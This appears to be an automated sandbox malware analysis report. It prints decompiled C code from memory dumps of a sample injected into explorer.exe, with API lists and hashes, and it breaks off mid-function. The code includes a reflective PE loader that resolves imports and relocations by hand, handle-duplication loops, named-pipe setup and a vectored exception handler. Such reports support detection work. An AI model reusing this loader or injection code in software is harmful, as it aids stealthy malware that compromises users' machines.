0x10004e5b
0x10004e60
0x10004e69
0x10004e6e
0x10004e76
0x10004e7d
0x10004e7e
0x10004e80
0x10004e9c
0x10004e9f
0x10004e9f
0x10004ea8
0x10004ead
0x10004ebd
0x10004ec5
0x10004eca
0x10004ed0
0x10004ed3
0x10004ed9
0x10004ef8
0x10004efe
0x10004eff
0x10004f00
0x10004f01
0x10004f02
0x10004f03
0x10004f0d
0x10004f11
0x10004f16
0x10004f19
0x10004f1b
0x10004f2d
0x10004f2d
0x10004f2f
0x10004f3b
0x10004f40
0x10004f46
0x10004f4f
0x10004f52
0x10004f54
0x10004f5f
0x10004f64
0x10004f69
0x10004f6e
0x10004f6e
0x10004f71
0x10004f78
0x00000000
0x10004f7e
0x10004f7e
0x10004f83
0x10004f87
0x10004f89
0x10004f8c
0x10004f8e
0x10004f94
0x10004f94
0x10004f8e
0x10004f96
0x10004f9b
0x10004fa1
0x10004fa3
0x00000000
0x10004fa9
0x10004fa9
0x10004fad
0x10005082
0x10005088
0x1000508e
0x10005099
0x1000509a
0x1000509b
0x1000509c
0x100050a2
0x100050a7
0x100050ad
0x100050b5
0x100050bb
0x100050be
0x100050cd
0x100050d4
0x100050d7
0x100050e4
0x100050e8
0x100050f5
0x100050fa
0x100050fd
0x100050ff
0x10005110
0x10005112
0x10005116
0x10005117
0x10005119
0x10005124
0x10005129
0x10005136
0x1000513a
0x1000513b
0x1000513d
0x10005145
0x10005146
0x1000514b
0x10005163
0x10005168
0x1000516b
0x1000516f
0x10005171
0x10005184
0x1000518e
0x10005192
0x1000519a
0x1000519b
0x100051a3
0x100051a4
0x100051a9
0x100051b5
0x100051bf
0x100051d1
0x100051dd
0x100051e2
0x100051e2
0x100051ec
0x100051f2
0x100051f2
0x10005119
0x100050ff
0x00000000
0x10005088
0x10004fb3
0x10004fb6
0x00000000
0x00000000
0x10004fbc
0x10004fc7
0x10004fc8
0x10004fc9
0x10004fca
0x10004fd0
0x10004fd5
0x10004fe9
0x10004fee
0x10004ff2
0x10004ffd
0x10005006
0x10005008
0x1000500c
0x1000500d
0x1000500f
0x1000501a
0x10005020
0x10005032
0x10005035
0x10005038
0x10005045
0x1000504d
0x10005057
0x10005069
0x10005075
0x1000507a
0x00000000
0x1000500f
0x10004fa3
0x10004edb
0x10004edb
0x10004ee1
0x10004ee3
0x00000000
0x00000000
0x10004ee5
0x10004ee9
0x100051f3
0x100051f8
0x100051fe
0x10005200
0x10005201
0x10005205
0x10005215
0x1000521a
0x1000521e
0x10005220
0x10005224
0x10005229
0x1000522b
0x1000522d
0x10005233
0x10005233
0x10005240
0x10005246
0x1000524c
0x10005251
0x1000526f
0x10005271
0x1000527d
0x1000527d
0x10005283
0x10005285
0x1000528b
0x1000529d
0x100052a3
0x100052af
0x100052b7
0x100052b7
0x100052b7
0x100052b9
0x100052bf
0x100052bf
0x10004eef
0x10004ef2
0x00000000
0x00000000
0x00000000
0x10004ef2
0x10004ed9
0x10004e1d
0x10004e1d
0x00000000
0x10004e1d
0x10004d9b
0x10004da2
0x10004dab
0x10004dad
0x10004db3
0x10004dc4
0x10004dcd
0x10004dcd
0x10004dd9
0x10004de2
0x10004de7
0x10004dec
0x00000000
0x00000000
0x10004dec

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
lstrcpynW.KERNEL32(02DA0158,00000105), ref: 1000526F
lstrcpynW.KERNEL32(02DA0368,00000105), ref: 10005283

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
Opcode Fuzzy Hash: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52

Uniqueness

Uniqueness Score: -1.00%

Function 10012AEC, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

0x10012afb
0x10012b01
0x10012b0a
0x10012b0d
0x10012b10
0x00000000
0x10012c01
0x10012c05
0x10012c07
0x10012c15
0x10012d33
0x10012d3c
0x10012d3f
0x10012d43
0x10012d49
0x10012d51
0x10012d51
0x10012d59
0x00000000
0x10012d64
0x10012c1b
0x10012c24
0x10012c32
0x10012c35
0x10012c52
0x10012c59
0x10012c6b
0x10012c6b
0x10012c72
0x10012c82
0x10012c9a
0x10012c84
0x10012c8c
0x10012c8c
0x10012c9d
0x10012ca1
0x10012cb1
0x10012cd4
0x10012ce6
0x10012cb3
0x10012cc7
0x10012cc7
0x10012cf0
0x10012d0c
0x10012cf2
0x10012d01
0x10012d01
0x10012d14
0x10012d1d
0x10012d1d
0x10012d2b
0x00000000
0x10012c74
0x10012c76
0x00000000
0x10012c76
0x10012c72
0x00000000
0x10012c35
0x10012b18
0x10012b26
0x10012b2b
0x10012b36
0x10012b39
0x10012b3d
0x10012b3f
0x10012b4f
0x10012b58
0x10012b61
0x10012b69
0x10012b72
0x10012b7d
0x10012b83
0x10012b86
0x10012b89
0x10012b90
0x10012b97
0x00000000
0x00000000
0x10012ba2
0x10012bb0
0x10012bbb
0x10012bc5
0x10012bdd
0x10012bea
0x10012bea
0x10012bc7
0x10012bd2
0x10012bd2
0x10012bf1
0x10012bf1
0x10012bf9
0x10012bf9
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 10012C4C
LoadLibraryA.KERNEL32(?), ref: 10012C65
GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
Instruction ID: 2edd54a6eb651874f6cc264e5dd0ce055865838d2197d7e71e48a8f46057b6f1
Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
Instruction Fuzzy Hash: 62A168B5E00219DFCB40CFA8D881AADBBF1FF08354F108469E915AB351D734EA91CB64

Uniqueness

Uniqueness Score: -1.00%

Function 10001C68, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x1001e6dc; // 0x0
				_t13 = E1000A4BF(_t41, 0);
				while(_t13 < 0) {
					E1000980C( &_v28);
					_t43 =  *0x1001e6e0; // 0x0
					_t15 =  *0x1001e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x1001e684; // 0x2e1faa0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x1001e684; // 0x2e1faa0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x1001e6dc; // 0x0
						__eflags = 0;
						_t13 = E1000A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x1001e6e8; // 0x0
				_v28 = _t20;
				_t22 = E1000A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
					E1000980C(0x1001e6e0);
					_t64 = E10001A1B( &_v28, E10001226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x1001e760);
						_t51 = 0x27;
						E10009F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x1001e684; // 0x2e1faa0
				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
				_t48 =  *0x1001e6dc; // 0x0
				 *0x1001e6d0 = 0;
				E1000A4DB(_t48);
				E1000861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

0x10001c68
0x10001c75
0x10001c77
0x10001c7e
0x10001ce4
0x10001c8b
0x10001c90
0x10001c96
0x10001c9b
0x10001ca1
0x10001ca3
0x10001ca7
0x10001d15
0x10001d17
0x10001d99
0x10001d9f
0x10001d9f
0x10001ca9
0x10001cb1
0x10001cb1
0x10001cbd
0x10001cc3
0x10001cc5
0x00000000
0x00000000
0x10001cc7
0x10001cd1
0x10001cd7
0x10001cdd
0x10001cdf
0x00000000
0x10001cdf
0x10001cab
0x10001caf
0x00000000
0x00000000
0x00000000
0x10001caf
0x10001cee
0x10001cef
0x10001cf0
0x10001cf1
0x10001cf2
0x10001cf7
0x10001d01
0x10001d06
0x10001d0e
0x10001d29
0x10001d2c
0x10001d36
0x10001d41
0x10001d54
0x10001d56
0x10001d58
0x10001d5a
0x10001d5b
0x10001d63
0x10001d64
0x10001d6a
0x10001d10
0x10001d10
0x10001d10
0x10001d6b
0x10001d76
0x10001d79
0x10001d7f
0x10001d85
0x10001d90
0x10001d97
0x00000000

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
Instruction ID: 912c1b93fe30e14ebce55579952f4eddc1cb52f7c5d97e94b218bb2c615be3ff
Opcode Fuzzy Hash: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
Instruction Fuzzy Hash: C831C036604264AFF344DFA4DCC5C6E77A9FB983D0B904A2AF941C32A5DA30ED048B52

Uniqueness

Uniqueness Score: -1.00%

Function 10001B2D, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E10001B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x1001e6f4; // 0x0
				_t12 = E1000A4BF(_t38, 0);
				while(_t12 < 0) {
					E1000980C( &_v28);
					_t40 =  *0x1001e700; // 0x0
					_t14 =  *0x1001e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x1001e684; // 0x2e1faa0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x1001e684; // 0x2e1faa0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x1001e6f4; // 0x0
								__eflags = 0;
								_t12 = E1000A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E1000980C(0x1001e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x1001e6e8; // 0x0
				_v28 = _t24;
				_t61 = E10001A1B( &_v28, E1000131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x1001e760);
					_t48 = 0x27;
					E10009F06(_t48);
				}
				if(_v24 != 0) {
					E10006890( &_v24);
				}
				_t26 =  *0x1001e684; // 0x2e1faa0
				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
				_t28 =  *0x1001e758; // 0x0
				 *0x1001e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x1001e6f4; // 0x0
				 *0x1001e758 =  !=  ? 1 : _t28;
				E1000A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}

0x10001b2d
0x10001b33
0x10001b41
0x10001baf
0x10001b4e
0x10001b53
0x10001b59
0x10001b5e
0x10001b64
0x10001b66
0x10001b6a
0x10001c64
0x10001c64
0x10001b70
0x10001b70
0x10001b7c
0x10001b7c
0x10001b88
0x10001b8e
0x10001b90
0x00000000
0x10001b92
0x10001b92
0x10001b9c
0x10001ba2
0x10001ba8
0x10001baa
0x00000000
0x10001baa
0x10001b72
0x10001b72
0x10001b76
0x00000000
0x00000000
0x00000000
0x00000000
0x10001b76
0x10001b70
0x10001c5d
0x10001c63
0x10001c63
0x10001bb8
0x10001bcc
0x10001bcf
0x10001bd9
0x10001be5
0x10001bef
0x10001bf0
0x10001bf1
0x10001bf2
0x10001bf7
0x10001c00
0x10001c04
0x10001c06
0x10001c07
0x10001c0f
0x10001c10
0x10001c16
0x10001c1b
0x10001c21
0x10001c21
0x10001c26
0x10001c31
0x10001c34
0x10001c3c
0x10001c48
0x10001c4b
0x10001c51
0x10001c56
0x10001c5b
0x00000000

APIs

GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
DuplicateHandle.KERNEL32 ref: 10001BD9

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
Instruction ID: 6a0302f5f4fd7db6b8bd225124d86af098f07b21623db759acfbad22203cc7cf
Opcode Fuzzy Hash: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
Instruction Fuzzy Hash: 50319C756083A19FF744DF64CCD886E77A9EB983D0B418968F601872A6DB30EC44CB52

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 1172 Parent PID: 2852 explorer.exeCOMMON

Executed Functions

Function 000831C2, Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E000831C2(void* __edx, void* __eflags) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				signed int _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr _t28;
				void* _t38;
				CHAR* _t40;

				_t38 = __edx;
				_t28 =  *0x9e688; // 0xb0000
				_t10 = E0008C292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
				_t40 = _t10;
				_v8 = _t40;
				if(_t40 != 0) {
					_t11 = E00088604(0x80000); // executed
					 *0x9e724 = _t11;
					__eflags = _t11;
					if(_t11 != 0) {
						_t12 = E0008BD10(); // executed
						_v16 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_push(0xc);
							_pop(0);
							_v12 = 1;
						}
						_v20 = 0;
						__eflags = 0;
						asm("sbb eax, eax");
						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
						 *0x9e674 = _t16;
						__eflags = _t16 - 0xffffffff;
						if(_t16 != 0xffffffff) {
							E0008BC7A( &_v20, _t38); // executed
							_t18 = E000898EE(E000832A1, 0, __eflags, 0, 0); // executed
							__eflags = _t18;
							if(_t18 != 0) {
								goto L12;
							}
							_t22 =  *0x9e684; // 0xe9f8f0
							 *((intOrPtr*)(_t22 + 0x30))( *0x9e674);
							_push(0xfffffffd);
							goto L11;
						} else {
							 *0x9e674 = 0;
							_push(0xfffffffe);
							L11:
							_pop(0);
							L12:
							E0008861A( &_v8, 0xffffffff);
							return 0;
						}
					}
					_push(0xfffffff5);
					goto L11;
				}
				return _t10 | 0xffffffff;
			}

0x000831c2
0x000831c8
0x000831d8
0x000831dd
0x000831df
0x000831e4
0x000831f5
0x000831fa
0x00083200
0x00083202
0x0008320b
0x00083210
0x00083213
0x00083215
0x00083217
0x00083219
0x0008321a
0x0008321a
0x00083227
0x0008322a
0x0008322f
0x00083249
0x0008324f
0x00083254
0x00083257
0x00083263
0x00083271
0x00083278
0x0008327a
0x00000000
0x00000000
0x0008327c
0x00083287
0x0008328a
0x00000000
0x00083259
0x00083259
0x0008325f
0x0008328c
0x0008328c
0x0008328d
0x00083293
0x00000000
0x0008329c
0x00083257
0x00083204
0x00000000
0x00083204
0x00000000

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8e4c99b3068590da576ac944090c7757318e2abd6f1916c3762a3faa55aaa0e
Instruction ID: 8572b94192bc1e43ddf863f0276067eeaee28e73aa111561e36aea24d5a940c8
Opcode Fuzzy Hash: b8e4c99b3068590da576ac944090c7757318e2abd6f1916c3762a3faa55aaa0e
Instruction Fuzzy Hash: 6821C872604211AAEB10FBB9EC45FAE77A8FB95B74F20032AF165D71D1EE3489008751

Uniqueness

Uniqueness Score: -1.00%

Function 00085A61, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00085A61(void* __eflags) {
				intOrPtr _t2;
				void* _t6;
				void* _t7;

				_t2 =  *0x9e684; // 0xe9f8f0
				 *((intOrPtr*)(_t2 + 0x108))(1, E00085A06);
				E00085631(_t6, _t7); // executed
				return 0;
			}

0x00085a61
0x00085a6d
0x00085a73
0x00085a7a

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,00085A06,00085CE8), ref: 00085A6D

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
Instruction ID: 435aaf7462d5f916828f25a0b113b0bfc22426b62e8c3a1df64e723560edf676
Opcode Fuzzy Hash: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
Instruction Fuzzy Hash: 2FB092312509409BD640FB60CC8AEC83290BB20782F4100A072858A0A3DAE048906702

Uniqueness

Uniqueness Score: -1.00%

Function 00084A0B, Relevance: 9.3, APIs: 6, Instructions: 285
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00084A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x9e688; // 0xb0000
					_t125 =  *0x9e68c; // 0xe9fab8
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E0008BB8D(_t187) != 0) {
					L4:
					_t134 = _t128; // executed
					_t66 = E0008B7A8(_t134,  &_v516); // executed
					_push(_t134);
					_v1104 = _t66;
					E0008B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E000849C7( &_v1076,  &_v1076, _t206);
					_t141 = E0008D400( &_v1076, E0008C379( &_v1076), 0);
					E0008B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E00082C8F(_t187,  &_v1076, _t206, _t208); // executed
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E000892E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E000891E3(_v1112);
								_t145 = _t130;
								 *0x9e740 = _t76;
								 *0x9e738 = E000891E3(_t145);
								L17:
								_push(_t145);
								_t80 = E00089B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
								_t188 = _t80;
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x9b9ca);
								E00089F48(0xe); // executed
								E00089F6C(_t188, _t208, _t130); // executed
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb; // executed
								E0008A0AB(_t188, _t178, _t208); // executed
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E0008A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E0008A3ED(_t188, _t180, _t208); // executed
								}
								_t87 = E0008980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2; // executed
								_t89 = E0008A0AB(_t153, _t181, _t208); // executed
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E0008FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E0008E23E(_t183);
										}
										E000852C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x9e688; // 0xb0000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E0008109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E000885D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0xb0228
									_t153 = _t51;
									L25:
									_t90 = E0008553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x9e688; // 0xb0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
